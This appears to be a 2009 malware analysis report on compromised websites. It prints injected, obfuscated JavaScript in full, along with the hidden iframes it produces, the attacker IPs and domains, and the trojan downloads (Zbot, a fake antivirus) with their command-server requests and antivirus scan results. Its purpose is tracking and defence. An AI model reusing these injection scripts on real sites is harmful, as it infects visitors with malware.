Malicious code inserted: | |
<!-- ad --> aaa=(((61>=0.7?4870:178)>=(3.78e2>=0x5?7.709e3 </script><!-- /ad --> | |
Result: | |
<iframe src='hxxp://85.17.139.[BLOCKED]193/lasthero1/?t=2' style='visibility:hidden' ></iframe> | |
Detected on: | |
February 12 by http://www.malwaredomainlist.com/mdl.php?sort=Date...... | |
February 12 by http://forum.malekal.com/viewtopic.php?f=62&t=17311 | |
Virustotal Analysis on 2009.02.12 09:55:10 (CET): | |
2/39 (5.13%) | |
Ikarus T3.1.1.45.0 2009.02.12 Exploit.Win32.Pdfjsc | |
a-squared 4.0.0.93 2009.02.12 Exploit.Win32.Pdfjsc!IK | |
Virustotal Analysis on 2009.02.12 09:59:40 (CET): | |
Avast 4.8.1335.0 2009.02.11 Win32:Fabot | |
eSafe 7.0.17.0 2009.02.11 Suspicious File | |
Data 19 2009.02.12 Win32:Fabot | |
Symantec 10 2009.02.12 Suspicious.MH690.A | |
TrendMicro 8.700.0.1004 2009.02.12 PAK_Generic.001 | |
http://www.symantec.com/security_response/writeup.jsp?docid=2009-020600-4945-99 |
Other Malicious code inserted: | |
<!-- ad --><script> aaa=((567,gftzo),(0x2,document))[((0.3,2.46e2)>=(17,7918.)?(5249.>=0. | |
Result: | |
IFRAME is inserted into compromised webpages | |
<iframe src='hxxp://truittbros.net/' style='visibility:hidden' > </iframe> <iframe src='hxxp://idealadvertising.org/clicksagent/?...' style='visibility:hidden' > </iframe> idealadvertising.org has been created February 5, 2009 (Registrar: Joker.com) Same suspicious ip 85.17.189.183 (hosted by LEASEWEB - Netherland) | |
Payload detected by using the IP: | |
85.17.189.183/clicksagent/?h=17h 200 Found | |
Result: | |
MS-DOS executable PE for MS Windows | |
Virustotal Analysis: | |
File install.exe received on 02.19.2009 00:14:46 (CET) Result: 7/39 (17.95%) | |
http://www.virustotal.com/analisis/33723c307ee9548f4150a30a0679a62b | |
File Size: 47,104 bytes | |
ThreatExpert Analysis: | |
http://www.threatexpert.com/report.aspx?md5=dadb6a147a831902e20 62666e045a418 http://www.threatexpert.com/threats/trojan-win32-internetantivirus.html | |
Alias: | |
Trojan.Win32.InternetAntivirus [Ikarus] | |
Malicious code inserted: | |
<!-- ad --> <script language="JavaScript"> function rkfg(jflq){ return String.fromCharCode(jflq); } var ohhe="060105102114097109101032115114099061039104116116112058 04704711511711210111410511111409710012204610511010211104711111 21051150470631160610490510390321191051001161040610390480390321 04101105103104116061039048039032115116121108101061039118105115 10509810510810511612105803210410510010010111005903906206004710 5102114097109101062"; var ifdm=""; for(qhxk=0;qhxk<ohhe.length;qhxk+=3){ ifdm+=rkfg(ohhe.substr (qhxk, 3)); } window.status='Done'; document.write(ifdm); </script> <!-- /ad --> | |
* random letter | |
Same malicious code inserted: | |
<script language="JavaScript"> function pwby(yyiu){ return String.fromCharCode(yyiu); } var trsl="060105102114097109101032115114099061039104116116112058 04704711511711210111410511111409710012204610511010211104711111 21051150470631160610490500390321191051001161040610390480390321 04101105103104116061039048039032115116121108101061039118105115 10509810510810511612105803210410510010010111005903906206004710 5102114097109101062"; var mpsq=""; for(hwrv=0;hwrv<trsl.length;hwrv+=3){ mpsq+=pwby(trsl.substr (hwrv, 3)); } window.status='Done'; document.write(mpsq); </script> | |
Result: | |
<iframe src='hxxp://superioradz.info/opis/?t=13' width='0' height='0' style='visibility: hidden;'> </iframe> | |
Analysis: | |
http://www.threatexpert.com/report.aspx?md5=95c04992bf14769fbd1b7b0ada9b9e87 | |
HTTP Requests: | |
hxxp://85.17.189.183/opis/?6e53cb91d272691ff1f03316b4e40fe897304252d0b05b1 c33d58155a3825e960ee3a527ad0f3b81a23df2c7d43150e96be9dca7a6e59d3f4d816 ff4a5122e8f | |
hxxp://85.17.189.183/opis/?8fbe2b5fa4842f6f0fe51f024732e6b290ef4e487d3779dc2 d10d646083af5315a0c295b173c9074618dc04b42ade64ca0abd171ed2dcd203721fc9 bdd89aba3 | |
text/html (JavaScript) | |
Javascript Analysis: | |
http://wepawet.iseclab.org/view.php?hash=ca172b3a2297a76af1183181cba4249a&t =1234983863&type=js | |
Virustotal Analysis: VT: 1/39 (2.71%) | |
http://www.virustotal.com/analisis/df3279de33cdf24699004ab05ef61d13 | |
Alias: | |
JS/Xilos [Microsoft] | |
HTTP Requests: | |
hxxp://85.17.189.183/opis/?35c0378e5af230cb06d1aef60e9d313999fb02e0230541 0fd4357d45f884bd55584e963ddeeb3e2010d55b1bc73920171042005b87c96f99cb 9b3820d28f4413 | |
application/x-shockwave-flash (swf - Shockwave Flash File) | |
Result: | |
MS-DOS executable PE for MS Windows downloaded | |
hxxp://85.17.189.183/opis/?h=17 | |
File name: a.exe File Size: 8704 Bytes | |
ThreatExpert Analysis: | |
: | http://www.threatexpert.com/report.aspx?md5=8d82c411cb3748dfefcbd4277db7fbfd |
Virustotal Analysis: | |
File a.exe received on 02.18.2009 14:11:35 (CET) Result: 5/39 (12.82%) http://www.virustotal.com/analisis/a1bee09c6dd5cf3dbd890a4b777156b2 | |
File a.exe received on 02.19.2009 00:14:46 (CET) Result: 7/39 (17.95%) http://www.virustotal.com/analisis/4e0e89411f8cfb49482553319d080e38 | |
Alias: | |
Suspicious.MH690 [Symantec] | |
TrojanDownloader:Win32/Obitel.gen!A [Microsoft] | |
http://www.symantec.com/security_response/writeup.jsp?docid=2009-020600-4945-99 | |
Analysis: First infection: | |
HTTP Requests: | |
85.17.143.203:80 - [banksguard.com] | |
GET /pics/ncr.exe | |
File name: ncr.exe | |
File Size: 61952 Bytes | |
Alias & packer info: | |
Troj/Inject-EF [Sophos] | |
Trojan.Win32.Zbot [Ikarus] | |
packed with: PE_Patch [Kaspersky Lab] | |
ThreatExport Analysis: | |
http://www.threatexpert.com/report.aspx?md5=5d074816dc6625fcd8df4c8f7dce992b | |
Iseclab Anubis Analysis: | |
Ikarus Virus Scanner - Trojan.Win32.Zbot (Sig-Id:454183) | |
http://anubis.iseclab.org/?action=result&task_id=14fd198d4506042d4c901eed512f5f33 8&format=html | |
Virustotal Analysis: | |
File ncr.exe received on 02.18.2009 20:05:49 (CET) Result: 11/39 (28.21%) http://www.virustotal.com/analisis/2bcb0d524cf1e0524997077667c93963 | |
File ncr.exe received on 02.19.2009 11:55:07 (CET) Result: 14/39 (35.9%) http://www.virustotal.com/analisis/e1721fe1408999bfb71f97e749fa1b17 | |
mcenspc.dll | |
http://www.threatexpert.com/files/mcenspc.dll.html | |
Analysis: After first infection: | |
HTTP Activity: | |
85.17.143.203:80 - [banksguard.com] | |
Request: POST /pics/receiver/online | |
Anubis Iseclab Analysis: | |
http://anubis.iseclab.org/?action=result&task_id=14fd198d4506042d4c901eed512f5 f338&format=html | |
Detected on: | |
February 12 by http://secuboxlabs.fr/ | |
February 12 by http://www.malwaredomainlist.com/forums/index.php?topic=2550.0 | |
February 12 by http://forum.malekal.com/viewtopic.php?f=62&t=17311 | |
February 15 by http://www.malwaredomainlist.com/mdl.php?search=superioradz.info | |
The domain superioradz.info has suddenly disapeared (ns lookup failed)and the folder has been deleted/renamed. |
Other Malicious code inserted: | |
<!-- ad --> aaa=(((0x17,4.471e3),(3e0>8?0.93:23.)),((.1<0x738?6407:.87),(35.<= </script><!-- /ad --> | |
Result: | |
IFRAME is inserted into compromised webpages | |
<iframe src='hxxp://idealadvertising.org/clicksagent/?t=2' style='visibility:hidden' ></iframe> <iframe src='hxxp://idealadvertising.org/clicksagent/?...' style='visibility:hidden' > </iframe> idealadvertising.org has been created February 5, 2009 (Registrar: Joker.com) Same suspicious ip 85.17.189.183 (hosted by LEASEWEB - Netherland) | |
JavaScript Analysis: | |
http://wepawet.iseclab.org/view.php?hash=45d3... | |
JS Obfuscated Code: | |
hxxp://idealadvertising.org/clicksagent/?t=2 | |
hxxp://idealadvertising.org/clicksagent/?075c..... | |
hxxp://idealadvertising.org/clicksagent/?6cb..... | |
Network Activity: | |
81.2.253.206:80 - [www.sprinterkiado.hu] | |
Request: GET /index.php?session_id=57972&user_id=0&screen=8 | |
195.70.32.221:80 - [c.hu.tipptop.com] | |
Request: GET /cgi-bin/?id=3608&c=LPmcnYzL&h=1 | |
85.17.189.183:80 - [idealadvertising.org] | |
Request: GET /clicksagent/?t=2 | |
Result: MS-DOS executablePE for MS Windows: | |
hxxp://85.17.189.183/clicksagent/?h=17h File name: ncr.exe File Size: 8704 Bytes | |
Iseclab Anubis Analysis: | |
http://anubis.iseclab.org/?action=result&task_id=12d602... | |
VirusTotal Results: 7/39 (17.95%): | |
http://www.virustotal.com/analisis/33723c307ee9548f4150a30a0679a62b | |
Analysed on 02.19.2009 00:14:46 | |
Alias: | |
http://www.symantec.com/security_response/writeup.jsp?docid=2009-020600-4945-99&tabid=2 | |
Suspicious.MH690.A [Symantec] | |